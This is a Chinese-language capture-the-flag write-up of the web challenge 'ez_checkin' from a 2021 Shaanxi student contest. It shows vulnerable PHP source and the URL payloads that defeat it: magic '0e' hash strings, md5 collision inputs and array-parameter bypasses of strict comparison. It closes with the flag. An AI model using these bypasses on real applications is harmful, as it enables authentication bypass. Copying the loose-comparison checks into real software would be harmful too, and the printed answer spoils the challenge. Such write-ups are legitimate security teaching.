其他分享
首页 > 其他分享> > 2021陕西省大学生网络安全技能大赛 Web ez_checkin

2021陕西省大学生网络安全技能大赛 Web ez_checkin

作者:互联网

web ez_checkin

<?php

error_reporting(0);
include "flag.php";
echo "Come and hack me";

if (isset($_GET["param1"])){
    if ($_GET["param1"] == hash("md4", $_GET["param1"]))
    {
        echo "<br>Welcome to level 2!<br>";
        if (isset($_GET['param2']) && isset($_GET['param3'])) {

            if ($_GET['param2'] != $_GET['param3']  &&  md5($_GET['param2']) == md5(md5($_GET['param3']))){
                echo "<br>Welcome to level 3!<br>";
                if(isset($_GET['param4']) && isset($_GET['param5'])){
                    if($_GET['param4'] != $_GET['param5']  &&  md5($_GET['param4']) === md5($_GET['param5'])){

                        echo $flag;
                    }
                    else{
                        die("Come on !  One more trick!");
                    }
                }
            }

            else{
                die("What R U doing?");
        }

        }


    }
    else {

        die("????????????");



    }
}

$_GET["param1"] == hash("md4", $_GET["param1"])
http://9cff3263.yunyansec.com/index.php
?param1=0e251288019
$_GET['param2'] != $_GET['param3']  &&  md5($_GET['param2']) == md5(md5($_GET['param3']))
MD5大全:
 
CbDLytmyGm2xQyaLNhWn
 
md5(CbDLytmyGm2xQyaLNhWn) => 0ec20b7c66cafbcc7d8e8481f0653d18
 
md5(md5(CbDLytmyGm2xQyaLNhWn)) => 0e3a5f2a80db371d4610b8f940d296af
 
770hQgrBOjrcqftrlaZk
 
md5(770hQgrBOjrcqftrlaZk) => 0e689b4f703bdc753be7e27b45cb3625
 
md5(md5(770hQgrBOjrcqftrlaZk)) => 0e2756da68ef740fd8f5a5c26cc45064
 
7r4lGXCH2Ksu2JNT3BYM
 
md5(7r4lGXCH2Ksu2JNT3BYM) => 0e269ab12da27d79a6626d91f34ae849
 
md5(md5(7r4lGXCH2Ksu2JNT3BYM)) => 0e48d320b2a97ab295f5c4694759889f
http://9cff3263.yunyansec.com/index.php
?param1=0e251288019
&param2=0ec20b7c66cafbcc7d8e8481f0653d18
&param3=CbDLytmyGm2xQyaLNhWn
$_GET['param4'] != $_GET['param5']  &&  md5($_GET['param4']) === md5($_GET['param5'])
http://9cff3263.yunyansec.com/index.php
?param1=0e251288019
&param2=0ec20b7c66cafbcc7d8e8481f0653d18
&param3=CbDLytmyGm2xQyaLNhWn
&param4[]=1
&param5[]=2

flag{a869a5ea62bd6a8d2a9294dbc51c58ff}

标签:Web,GET,checkin,param4,param3,2021,&&,param2,md5
来源: https://www.cnblogs.com/seizer/p/14840901.html